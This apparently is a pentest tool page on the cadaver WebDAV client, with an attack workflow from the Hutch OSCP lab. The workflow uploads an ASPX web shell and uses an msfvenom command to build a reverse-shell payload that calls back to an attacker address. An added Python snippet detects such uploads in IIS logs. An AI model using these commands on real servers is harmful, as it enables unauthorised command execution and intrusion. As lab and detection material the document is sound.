Tools | February 9, 2026 | 2 min read | by 0xt0pus

Cadaver

WebDAV client for uploading and managing files on WebDAV-enabled servers



Description

cadaver is a command-line WebDAV client used for uploading and managing files on WebDAV-enabled servers. It is commonly used during penetration testing to upload web shells to servers that have WebDAV enabled, such as Microsoft IIS servers with WebDAV support.

Usage 1: Connect to a WebDAV Server

Connect to a WebDAV-enabled web server interactively using cadaver. You will be prompted for authentication credentials.

Command:

cadaver http://192.168.120.108

Usage 2: Upload a Web Shell via WebDAV

After connecting with cadaver, upload an ASPX web shell to the WebDAV server to gain command execution.

Command:

put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

Usage 3: Verify WebDAV is Enabled (Pre-check with curl)

Before using cadaver, verify that WebDAV is enabled on the target server by sending an HTTP OPTIONS request with curl.

Command:

curl -X OPTIONS http://192.168.153.122 -v

Expected Output Indicating WebDAV:

< DAV: 1,2,3
< MS-Author-Via: DAV

Full Attack Workflow (from Hutch OSCP Lab)

  1. Verify WebDAV is enabled:
curl -X OPTIONS http://192.168.153.122 -v
  2. Connect to WebDAV with cadaver:
cadaver http://192.168.120.108
  3. Upload ASPX web shell:
put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
  4. Access the web shell in a browser:
http://hutch.offsec/cmdasp.aspx
  5. Generate a reverse shell payload and upload it for a fully upgraded shell:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.187 LPORT=445 -f exe -o shell.exe
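
The workflow above leaves a recognisable trail in the IIS request log: a successful PUT of an .aspx file, followed by requests to that same path. The following detection sketch is an added example, not part of the original page; it assumes W3C-format logs with the fields named in the `#Fields` line, and the sample log lines, addresses, account name and user-agent strings are constructed.

```python
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")  # handlers IIS/ASP.NET will execute

# Constructed sample log, not taken from the page; IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-02-09 10:01:02 192.0.2.10 OPTIONS / - 80 - 198.51.100.7 curl/8.5.0 200
2026-02-09 10:02:10 192.0.2.10 PROPFIND / - 80 svc_web 198.51.100.7 cadaver/0.24+neon/0.32.5 207
2026-02-09 10:02:31 192.0.2.10 PUT /cmdasp.aspx - 80 svc_web 198.51.100.7 cadaver/0.24+neon/0.32.5 201
2026-02-09 10:02:40 192.0.2.10 PUT /notes.txt - 80 svc_web 198.51.100.7 cadaver/0.24+neon/0.32.5 201
2026-02-09 10:03:05 192.0.2.10 GET /cmdasp.aspx - 80 - 198.51.100.7 Mozilla/5.0 200
2026-02-09 10:03:20 192.0.2.10 POST /cmdasp.aspx - 80 - 198.51.100.7 Mozilla/5.0 200
2026-02-09 10:04:00 192.0.2.10 PUT /blocked.aspx - 80 - 203.0.113.9 cadaver/0.24+neon/0.32.5 403
"""


def parse_w3c(text):
    """Yield one dict per request, keyed by the log's own #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def find_script_uploads(text):
    """Successful PUTs of executable file types, with a count of later hits on them."""
    findings = {}
    for row in parse_w3c(text):
        path, method = row["cs-uri-stem"].lower(), row["cs-method"].upper()
        if not row["sc-status"].isdigit():
            continue
        status = int(row["sc-status"])
        if method == "PUT" and path.endswith(SCRIPT_EXTS) and 200 <= status < 300:
            findings[path] = {"path": path, "uploader": row["c-ip"],
                              "when": f'{row["date"]} {row["time"]}',
                              "agent": row["cs(User-Agent)"], "later_requests": 0}
        elif path in findings and method in ("GET", "POST") and status < 400:
            findings[path]["later_requests"] += 1  # uploaded file was then requested
    return list(findings.values())


if __name__ == "__main__":
    for f in find_script_uploads(SAMPLE_LOG):
        print(f"ALERT {f['when']} {f['uploader']} uploaded {f['path']} "
              f"via {f['agent']}; {f['later_requests']} later request(s)")
```

A finding with a non-zero `later_requests` count means the uploaded file was fetched after the write, which is the point at which the upload should be treated as an incident rather than a misconfiguration.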

Notes

  • cadaver is pre-installed on Kali Linux
  • Commonly used against Microsoft IIS servers with WebDAV enabled
  • Supports standard WebDAV operations: PUT, GET, DELETE, MKCOL, COPY, MOVE
  • Pair with Nmap's http-webdav-scan script to detect WebDAV during enumeration
  • Web shells commonly used: cmdasp.aspx (for IIS/ASP.NET targets)